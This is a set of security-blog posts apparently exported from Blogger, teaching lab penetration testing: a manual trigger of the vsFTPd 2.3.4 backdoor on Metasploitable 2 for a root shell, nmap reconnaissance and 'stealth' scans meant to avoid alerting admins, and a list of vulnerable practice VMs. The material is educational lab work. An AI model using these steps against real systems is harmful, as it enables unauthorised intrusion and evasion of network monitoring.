<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: show options <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">To see whether the target is set and any other remaining
required options that need to be set. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-WZWa19EzNFc/V-zqtrupGkI/AAAAAAAACoY/uxDkmUa72UgCi1ckB_j6SYogE7aiMZh4wCEw/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://4.bp.blogspot.com/-WZWa19EzNFc/V-zqtrupGkI/AAAAAAAACoY/uxDkmUa72UgCi1ckB_j6SYogE7aiMZh4wCEw/s400/6.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Looks like all is set. We now just need to execute the
exploit. We can do that by entering the command: exploit (or run). <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Running the set exploit</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-dSTaZk3xWm8/V-zquOL6p9I/AAAAAAAACoc/hM6jLeLKlvgkSEWylZ0nFxYZitz1BxJpgCEw/s1600/7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://3.bp.blogspot.com/-dSTaZk3xWm8/V-zquOL6p9I/AAAAAAAACoc/hM6jLeLKlvgkSEWylZ0nFxYZitz1BxJpgCEw/s400/7.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<br />
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This now gives you your backdoored shell :)</span><o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-30538525641603600302016-09-29T02:45:00.000-07:002016-10-12T03:14:06.504-07:00Pwning Metasploitable 2: Exploiting the Vulnerable vsFTPd 2.3.4 service (Manually)<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">I assume from the previous article that you did some
research on the vulnerable FTP service (<a href="https://security.appspot.com/vsftpd.html" target="_blank">vsFTPd 2.3.4</a>).<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">A quick intro to what is an exploit: <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">An exploit is a piece of code that takes advantage of a
security gap in an application code. In the case of vsFTPd 2.3.4, an intruder
modified the source code of the original vsFTPd 2.3.4 code to open a backdoored
version if the username entered ended with “:)” characters. The backdoored
version will open a listening connection on port 6200.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Lets check it out for ourselves.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Fire up your <a href="https://www.kali.org/" target="_blank">Kali</a> and <a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">Metaploitable 2</a>. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">We will skip the host
discovery part as we have covered it almost twice and want to avoid repetition.
You can find it <a href="http://edublog.bitcrack.net/2016/09/pwning-metasploitable-2-scoping-out.html" target="_blank">here</a>. <o:p></o:p></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span><span style="font-family: "trebuchet ms" , sans-serif;">Check the status of port 6200</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: nmap -p 6200 <<target IP
address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command with the “-p” flag tells nmap to scan port 6200
on the given target IP address.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-rXLVls8ZcYY/V-zhwHxNRoI/AAAAAAAACns/pD-DSirI_dcfxX3Y6Ki9HKy0t9oEMutLQCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="101" src="https://1.bp.blogspot.com/-rXLVls8ZcYY/V-zhwHxNRoI/AAAAAAAACns/pD-DSirI_dcfxX3Y6Ki9HKy0t9oEMutLQCLcB/s400/1.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">The results show that the port is closed and there is no
service running on it. <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Activating the backdoored vsFTPd 2.3.4</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the command: telnet <<target IP address>>
21<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Note that “21” in the above command references to the port
number the FTP service is running on. </span><span style="font-family: "trebuchet ms" , sans-serif;">After the command is executed, you are prompt to enter a
username and password to access the system.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-zhKlpmT8h5s/V-zhwPFKW0I/AAAAAAAACno/ncz6xj-IWQMGPSQ15I-GGTxl0WzyVEDawCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://3.bp.blogspot.com/-zhKlpmT8h5s/V-zhwPFKW0I/AAAAAAAACno/ncz6xj-IWQMGPSQ15I-GGTxl0WzyVEDawCEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">You can type anything as the username as long as it has the
2 characters “:)” at the end, and you will activate the backdoor. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Check the current status of port 6200</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Let’s now check the current status of the port 6200 with command:</span><span style="font-family: "trebuchet ms" , sans-serif;"> nmap -p 6200 <<target IP
address>></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-nJg0dZlnEqw/V-zhwak7R8I/AAAAAAAACnw/3aWSaux3Afcz54YfKMINBak2pIzgf38CwCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="101" src="https://2.bp.blogspot.com/-nJg0dZlnEqw/V-zhwak7R8I/AAAAAAAACnw/3aWSaux3Afcz54YfKMINBak2pIzgf38CwCEw/s400/3.PNG" width="400" /></a></div>
<div class="MsoNormal">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Voila! The port is now open. <o:p></o:p></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span><span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://technet.microsoft.com/en-us/library/cc739101(v=ws.10).aspx" target="_blank">Telnet</a> into port 6200</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter command: telnet <<target IP address>> 6200<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">After command execution, type in “id” to see what user you
are running as. <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-iTokMvAtX_8/V-zhw57k_uI/AAAAAAAACn0/VCYeqpV3VBolhYdrUh1oZvCgxkVEUEQqACEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="61" src="https://4.bp.blogspot.com/-iTokMvAtX_8/V-zhw57k_uI/AAAAAAAACn0/VCYeqpV3VBolhYdrUh1oZvCgxkVEUEQqACEw/s400/4.PNG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">With root access you can do lots of havoc.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">I will leave it up to you to research on telnet commands and
how to use those commands. </span></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-26648621093298606192016-09-28T03:41:00.000-07:002016-10-12T03:10:09.277-07:00Pwning Metasploitable 2: Scoping out Target<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Fire up your <a href="https://www.kali.org/" target="_blank">Kali</a> attacker machine and your new
<a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">metaploitable 2</a> machine. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Seeing a black screen with white text when firing up metasploitable
2? You are in the right place. Metaploitable 2 has no GUI for you to click
around. Its full CLI which will help you improve your command line skills. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Here’s how your screen should look like:</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-CzWdod7A1SA/V-uccrSKGGI/AAAAAAAACnQ/2xSHLdILojI6Goar5910INtFIQHIJUkQQCEw/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://4.bp.blogspot.com/-CzWdod7A1SA/V-uccrSKGGI/AAAAAAAACnQ/2xSHLdILojI6Goar5910INtFIQHIJUkQQCEw/s400/1.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Switch to your attacker machine. Let’s start a <a href="https://nmap.org/book/man-port-scanning-techniques.html" target="_blank">host discover scan</a> to find out metaploitable's IP address.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Ping Sweep to discover Live Hosts</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter command: nmap -sP -PI <<your network address/24><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-WsujCO5Y0O8/V-uccws1HYI/AAAAAAAACnU/UaKOag0EizYGJezwG-xidHz4jQTq9A5CQCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://3.bp.blogspot.com/-WsujCO5Y0O8/V-uccws1HYI/AAAAAAAACnU/UaKOag0EizYGJezwG-xidHz4jQTq9A5CQCEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">4 hosts show up on the result. Let’s analyze this, it can’t
be the address with “.1” and “.254” and it can’t also be the “.133” because that’s
your attacker machine. We have a host with “.128” and we know there is no other
machine running which means it is the metasploitable machine. Your IP addresses
may vary but the logic still applies. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">So we now know where our target is. Lets look for open
ports, services and operating system that is running on our target. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Open Ports, Services and OS discovery</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter command: nmap -sV -O -p 0-65535 <<target IP
address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command with the “-p” flag tells nmap to scan all 65535
ports on the target. Remember a normal scan only scans 1000 ports. And a full
port scan makes more noise than a normal scan because it attempts to establish
connections with much more ports. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Qx9HONXyzHg/V-ucc4CQ62I/AAAAAAAACnY/EdPH8KVIDFctVsTLsHvaykWxXJ2fg73zgCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="365" src="https://3.bp.blogspot.com/-Qx9HONXyzHg/V-ucc4CQ62I/AAAAAAAACnY/EdPH8KVIDFctVsTLsHvaykWxXJ2fg73zgCEw/s400/3.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Now we can see all open ports, what services are running on
them, their versions and the operating system. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Carefully look at the services that are open. For example, FTP is
open. <a href="https://flow.microsoft.com/en-us/services/shared_ftp/ftp/" target="_blank">FTP</a> (File Transfer Protocol) is used to send and receive files over a network. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">We could potentially use this protocol and maybe retrieve some
local files from that host, or send in a <a href="https://blogs.mcafee.com/consumer/what-is-a-keylogger/" target="_blank">keylogger</a> to record the user's keyboard activity to gather passwords and other information. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Questions to ask yourself:-</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">1. Can I interact with the FTP service on port 21?<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">2. Can I access the service using any default credentials?<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">3. What version is the service? Is it the latest?<o:p></o:p></span></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">4. Google any known exploits for that service version?</span><o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Activate your google searching skills and try to answer these questions
by yourself first. In our next tutorial we will dig deeper on the FTP service. </span><o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-1677492847045059982016-09-28T02:25:00.003-07:002016-10-12T03:05:26.236-07:00Adding More Machines to Your Virtual Hack Lab<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">There are intentionally vulnerable virtual machines that
security professionals use to practice penetration testing trainings, conduct
security trainings and test out tools and exploits. These virtual machines are
best for honing your skills as the most basic vulnerabilities are available for
you to discover and exploit giving you confidence and experience at finding
them. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Metaploitable 2</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Metasploitable is am Ubuntu Linux virtual machine. This is
number 1 on my list because it allows you to learn from basics to advance on
both infrastructure penetration testing and web penetration testing with
Mutillidae and DVWA pre-installed.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">You can find the VM <a href="https://sourceforge.net/projects/metasploitable/" target="_blank">here</a> <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Good thing about Metaploitable is that it will use the least
amount of your computer’s resources with 512MB of RAM and 8GB of HDD leaving
you more room for more VMs’ running at the same time. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Go ahead download the VM and get it ready to run. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Note that, by default, there are 2 network adapters
installed on the VM. Remove the 2<sup>nd</sup> network adapter and change the
first one from NAT to VMNet1 (Host Only) so that it is in the network as your
attacker machine. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Hackxor</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This is designed as a game where you have to gain root
access to the system through the progressing the game story. This is focused on
web application hacking.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">You can find the VM </span><a href="https://sourceforge.net/projects/hackxor/files/hackxor1.7z/download" style="font-family: "Trebuchet MS", sans-serif;" target="_blank">here</a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">There are hundreds of other vulnerable VMs available out there which have not been mentioned. Because all you need to get started is Metaploitable and Hackxor. After mastering these two, you will have enough experience to go on and pwn machines solo :) </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-87554319746755807862016-09-27T05:49:00.000-07:002016-10-12T02:56:36.288-07:00Simple Guide to Network Scanning with Nmap<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://nmap.org/" target="_blank">Nmap</a> is a popular <a href="https://opensource.com/resources/what-open-source" target="_blank">open source</a>
network exploration tool. It is a ton of features that are very useful to
anyone trying to scan, even enumerate and look for vulnerabilities on a host or
network. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Starting with the very basics;
when scanning you are usually looking for the ports that are open on the live
hosts and the services that are running on them. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">There are 6 states a port can be
but we will look only at the 2 main states: Open and Closed.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Open port: This means that an
application is listening for connections on the is port. This is good, as it
tells you that you can interact with it. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Closed port: This means that there
is no application listening on this port. And you cannot talk to a closed port.
<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Let’s start looking at open ports
on our victim machines.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">From previous articles you learnt
about a ICMP ping sweep <a href="https://nmap.org/book/man-port-scanning-techniques.html" target="_blank">scan with Nmap</a>. Here we look at a TCP SYN ping scan.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">TCP SYN Ping Scan</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Input the command: nmap -PS <<target
IP address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command with the “-PS” flag
tells nmap to send a SYN packet to the target and listen for a response. This
command comes in handy for when your target system is configured to block ICMP
ping sweeps. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-XCOfA17TXI4/V-ppkRxWdXI/AAAAAAAACnA/dAuvOD73L5wcLbKS787R6wYkBfvCSSEcQCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://1.bp.blogspot.com/-XCOfA17TXI4/V-ppkRxWdXI/AAAAAAAACnA/dAuvOD73L5wcLbKS787R6wYkBfvCSSEcQCLcB/s400/1.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Stealth Scan</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Input the command: nmap -sS <<target
IP address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command with the “-sS” flag
tells nmap to initiate a three-way handshake with the target but do not
complete the hand shake. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-URpv0fNTeck/V-ppkboCBjI/AAAAAAAACm8/RCsSWeweW64EO62ZbeSCee6YKtebzb5-gCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://4.bp.blogspot.com/-URpv0fNTeck/V-ppkboCBjI/AAAAAAAACm8/RCsSWeweW64EO62ZbeSCee6YKtebzb5-gCEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This was useful in the past when
firewalls dint used to log incomplete handshakes with the computer’s port.
However with the latest firewalls, even an incomplete handshake is logged and
thus not so stealth anymore. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Full Nmap Scan</span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Input the command: nmap -sV -O<<target
IP address>><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">With this command nmap scans the
first 1000 ports on the target, with the “-sV” flag to find out the version of
the services running on the open ports and with the “-O” flag to find out the
operating system running on the target. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Look through the results and see if
you can locate the OS details and the version numbers of any services
discovered. <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Now you must be wondering why put all different flags while you can just run a full scan and get the same results? The answer is noise. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Running a full scan over the network makes too much noise and the network admins can get alerted and can even blacklist your attacker machine. So we resort to running specific scans to find out specific bits of information while make less noise. </span></div>
<div class="MsoNormal">
